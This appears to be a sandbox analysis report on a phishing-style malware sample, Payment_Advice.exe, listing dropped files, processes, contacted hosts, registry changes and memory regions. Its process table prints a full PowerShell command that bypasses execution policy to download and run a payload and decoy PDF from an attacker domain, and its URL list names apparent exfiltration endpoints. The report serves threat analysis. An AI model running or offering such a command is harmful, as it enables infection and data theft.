Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Payment_Advice.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\Public\Payment_Advice.pdf
|
PDF document, version 1.4, 1 pages
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs
|
data
|
dropped
|
|
|
|
C:\Windows\Temp\hadvices.scr
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xd9fe882d, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\4b141779-8272-4dee-8709-72b82cd279c6.tmp
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF65e10e.TMP (copy)
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\f852accf-f28f-4ae2-8d30-4d118b5cda62.tmp
|
JSON data
|
modified
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-240501131714Z-209.bmp
|
PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4,
UTF-8, version-valid-for 15
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
|
SQLite Rollback Journal
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.4856
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)
|
PostScript document text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8,
version-valid-for 25
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
|
SQLite Rollback Journal
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment_Advice.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hadvices.scr.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI4e076.LOG
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bfkztsop.5yd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k51jbhqe.hkh.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-05-01 15-17-11-261.log
|
ASCII text, with very long lines (393)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
|
ASCII text, with very long lines (393), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\79871d27-0a6d-4cd6-b73d-e2d46aa9b4ce.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\9f7c0cdb-c909-4e29-af04-38acd963e81f.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\d1ee8daa-a8ce-4d69-b25f-47a9fefe7d26.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1111944
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\d8e14f58-9577-42bf-9621-9055a66d181f.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 48 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\Payment_Advice.exe
|
"C:\Users\user\Desktop\Payment_Advice.exe"
|
|
|
|
C:\Users\user\Desktop\Payment_Advice.exe
|
"C:\Users\user\Desktop\Payment_Advice.exe"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf'
-OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri
'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"
|
|
|
|
C:\Windows\Temp\hadvices.scr
|
"C:\Windows\Temp\hadvices.scr" /S
|
|
|
|
C:\Windows\Temp\hadvices.scr
|
"C:\Windows\Temp\hadvices.scr"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Payment_Advice.pdf"
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService
--lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0"
--lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100
--field-trial-handle=1700,i,16204253092957558570,3256571588782708314,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker
/prefetch:8
|
There are 1 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://advising-receipts.com/hsbc/hadvices.scr
|
172.67.141.195
|
|
|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://advising-receipts.com
|
unknown
|
|
|
|
https://advising-receipts.com/hsbc/Payment_Advice.pdf
|
172.67.141.195
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://advising-receipts.com
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
http://checkip.dyndns.org
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://go.mic
|
unknown
|
||
|
http://mail.qoldenfrontier.com
|
unknown
|
||
|
https://www.adobe.co
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
|
http://checkip.dyndns.org/
|
193.122.130.0
|
||
|
https://reallyfreegeoip.org/xml/149.18.24.96
|
172.67.177.134
|
||
|
https://reallyfreegeoip.org/xml/149.18.24.96$
|
unknown
|
||
|
http://checkip.dyndns.org/q
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://scratchdreams.tk
|
unknown
|
||
|
http://reallyfreegeoip.org
|
unknown
|
||
|
https://reallyfreegeoip.org
|
unknown
|
||
|
https://scratchdreams.tk/_send_.php?TS
|
172.67.169.18
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://checkip.dyndns.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://scratchdreams.tk
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/
|
unknown
|
There are 23 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
mail.qoldenfrontier.com
|
108.167.142.65
|
|
|
|
advising-receipts.com
|
172.67.141.195
|
|
|
|
checkip.dyndns.org
|
unknown
|
|
|
|
reallyfreegeoip.org
|
172.67.177.134
|
||
|
scratchdreams.tk
|
172.67.169.18
|
||
|
checkip.dyndns.com
|
193.122.130.0
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
172.67.141.195
|
advising-receipts.com
|
United States
|
|
|
|
108.167.142.65
|
mail.qoldenfrontier.com
|
United States
|
|
|
|
23.56.12.145
|
unknown
|
United States
|
||
|
172.67.169.18
|
scratchdreams.tk
|
United States
|
||
|
193.122.130.0
|
checkip.dyndns.com
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
||
|
172.67.177.134
|
reallyfreegeoip.org
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
aFS
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
tDIText
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
tFileName
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
tFileSource
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
sFileAncestors
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
sDI
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
sDate
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
uFileSize
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
uPageCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
sAssetId
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
bisSharedFile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
aFS
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
tDIText
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
tFileName
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
sFileAncestors
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
sDI
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
sDate
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
uFileSize
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
uPageCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
bisSharedFile
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\hadvices_RASMANCS
|
FileDirectory
|
There are 43 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
3131000
|
trusted library allocation
|
page read and write
|
|
|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
3E56000
|
trusted library allocation
|
page read and write
|
|
|
|
3419000
|
trusted library allocation
|
page read and write
|
|
|
|
7FFAACED0000
|
trusted library allocation
|
page read and write
|
||
|
114A000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BA6000
|
trusted library allocation
|
page read and write
|
||
|
28FCBBD7000
|
heap
|
page read and write
|
||
|
1720000
|
trusted library allocation
|
page read and write
|
||
|
1114000
|
trusted library allocation
|
page read and write
|
||
|
1400000
|
trusted library allocation
|
page read and write
|
||
|
1E16CCF3000
|
heap
|
page read and write
|
||
|
1B480C32000
|
trusted library allocation
|
page read and write
|
||
|
1432000
|
heap
|
page read and write
|
||
|
7FFAACDF0000
|
trusted library allocation
|
page read and write
|
||
|
55EE000
|
trusted library allocation
|
page read and write
|
||
|
5D90000
|
trusted library allocation
|
page execute and read and write
|
||
|
5382000
|
trusted library allocation
|
page read and write
|
||
|
6F9E000
|
stack
|
page read and write
|
||
|
1E167F1A000
|
heap
|
page read and write
|
||
|
5750000
|
trusted library allocation
|
page read and write
|
||
|
28FCD650000
|
heap
|
page read and write
|
||
|
1E1675A0000
|
heap
|
page read and write
|
||
|
5C7F000
|
stack
|
page read and write
|
||
|
FE075FB000
|
stack
|
page read and write
|
||
|
3241000
|
trusted library allocation
|
page read and write
|
||
|
5475873000
|
stack
|
page read and write
|
||
|
5342000
|
trusted library section
|
page read and write
|
||
|
13D3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B4E93D0000
|
heap
|
page readonly
|
||
|
41A1000
|
trusted library allocation
|
page read and write
|
||
|
1E16CB60000
|
trusted library allocation
|
page read and write
|
||
|
6DDE000
|
stack
|
page read and write
|
||
|
1243000
|
heap
|
page read and write
|
||
|
2BB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD50000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACDC0000
|
trusted library allocation
|
page read and write
|
||
|
5630000
|
trusted library allocation
|
page read and write
|
||
|
1732000
|
trusted library allocation
|
page read and write
|
||
|
C30000
|
unkown
|
page readonly
|
||
|
C732A7E000
|
unkown
|
page readonly
|
||
|
3A1E000
|
stack
|
page read and write
|
||
|
13D0000
|
trusted library allocation
|
page read and write
|
||
|
547603F000
|
stack
|
page read and write
|
||
|
13CE000
|
stack
|
page read and write
|
||
|
5475E37000
|
stack
|
page read and write
|
||
|
129E000
|
stack
|
page read and write
|
||
|
55F6000
|
trusted library allocation
|
page read and write
|
||
|
33DE000
|
trusted library allocation
|
page read and write
|
||
|
5656000
|
trusted library allocation
|
page read and write
|
||
|
2FF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB226E0000
|
unkown
|
page read and write
|
||
|
32CA000
|
trusted library allocation
|
page read and write
|
||
|
345C000
|
trusted library allocation
|
page read and write
|
||
|
1E16CA80000
|
trusted library allocation
|
page read and write
|
||
|
3448000
|
trusted library allocation
|
page read and write
|
||
|
142D000
|
heap
|
page read and write
|
||
|
C7335FE000
|
stack
|
page read and write
|
||
|
1E168A30000
|
trusted library allocation
|
page read and write
|
||
|
58CD000
|
stack
|
page read and write
|
||
|
33A9000
|
trusted library allocation
|
page read and write
|
||
|
41D2000
|
trusted library allocation
|
page read and write
|
||
|
1B4E9C7C000
|
heap
|
page read and write
|
||
|
1E16CA80000
|
trusted library allocation
|
page read and write
|
||
|
172D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B48160B000
|
trusted library allocation
|
page read and write
|
||
|
1160000
|
heap
|
page read and write
|
||
|
28FCBBA0000
|
heap
|
page read and write
|
||
|
31ED000
|
trusted library allocation
|
page read and write
|
||
|
C73427E000
|
stack
|
page read and write
|
||
|
630E000
|
stack
|
page read and write
|
||
|
33E8000
|
trusted library allocation
|
page read and write
|
||
|
FE070FF000
|
stack
|
page read and write
|
||
|
33D6000
|
trusted library allocation
|
page read and write
|
||
|
53C4000
|
trusted library allocation
|
page read and write
|
||
|
13E6000
|
heap
|
page read and write
|
||
|
2DAE000
|
stack
|
page read and write
|
||
|
5760000
|
trusted library allocation
|
page read and write
|
||
|
31E7000
|
trusted library allocation
|
page read and write
|
||
|
1100000
|
trusted library allocation
|
page read and write
|
||
|
4F4E000
|
stack
|
page read and write
|
||
|
C733AFE000
|
stack
|
page read and write
|
||
|
1B4E9B80000
|
heap
|
page read and write
|
||
|
31EF000
|
trusted library allocation
|
page read and write
|
||
|
1E16CCF8000
|
heap
|
page read and write
|
||
|
533F000
|
trusted library section
|
page read and write
|
||
|
5476CCD000
|
stack
|
page read and write
|
||
|
1E167600000
|
heap
|
page read and write
|
||
|
7FFAACE00000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACEA0000
|
trusted library allocation
|
page read and write
|
||
|
6C5E000
|
stack
|
page read and write
|
||
|
1730000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE70000
|
trusted library allocation
|
page read and write
|
||
|
3200000
|
trusted library allocation
|
page read and write
|
||
|
31EA000
|
trusted library allocation
|
page read and write
|
||
|
1B4E9D15000
|
heap
|
page read and write
|
||
|
7FFAACE40000
|
trusted library allocation
|
page read and write
|
||
|
5476D4B000
|
stack
|
page read and write
|
||
|
11A0000
|
heap
|
page read and write
|
||
|
1B4E93A5000
|
heap
|
page read and write
|
||
|
5476B0E000
|
stack
|
page read and write
|
||
|
C73417E000
|
unkown
|
page readonly
|
||
|
53B5000
|
trusted library allocation
|
page read and write
|
||
|
1920000
|
heap
|
page read and write
|
||
|
1E167679000
|
heap
|
page read and write
|
||
|
6B1E000
|
stack
|
page read and write
|
||
|
32E6000
|
trusted library allocation
|
page read and write
|
||
|
B90000
|
heap
|
page read and write
|
||
|
C73367E000
|
unkown
|
page readonly
|
||
|
339F000
|
trusted library allocation
|
page read and write
|
||
|
1E1686B0000
|
trusted library section
|
page readonly
|
||
|
1B4E9390000
|
trusted library allocation
|
page read and write
|
||
|
2C78000
|
trusted library allocation
|
page read and write
|
||
|
389E000
|
stack
|
page read and write
|
||
|
1E16CA70000
|
trusted library allocation
|
page read and write
|
||
|
1B4E7A5F000
|
heap
|
page read and write
|
||
|
64AF000
|
stack
|
page read and write
|
||
|
7030000
|
trusted library allocation
|
page read and write
|
||
|
118E000
|
heap
|
page read and write
|
||
|
53C9000
|
trusted library allocation
|
page read and write
|
||
|
57B0000
|
trusted library section
|
page read and write
|
||
|
1740000
|
trusted library allocation
|
page read and write
|
||
|
5BCE000
|
stack
|
page read and write
|
||
|
10FE000
|
stack
|
page read and write
|
||
|
3C5F000
|
stack
|
page read and write
|
||
|
1390000
|
heap
|
page read and write
|
||
|
1B4E9A90000
|
heap
|
page execute and read and write
|
||
|
7FFB226E5000
|
unkown
|
page readonly
|
||
|
53A6000
|
trusted library allocation
|
page read and write
|
||
|
1B4E79F8000
|
heap
|
page read and write
|
||
|
1B4E79D0000
|
heap
|
page read and write
|
||
|
122D000
|
heap
|
page read and write
|
||
|
1B4E99A8000
|
heap
|
page read and write
|
||
|
C73387E000
|
unkown
|
page readonly
|
||
|
54758FE000
|
stack
|
page read and write
|
||
|
5617000
|
trusted library allocation
|
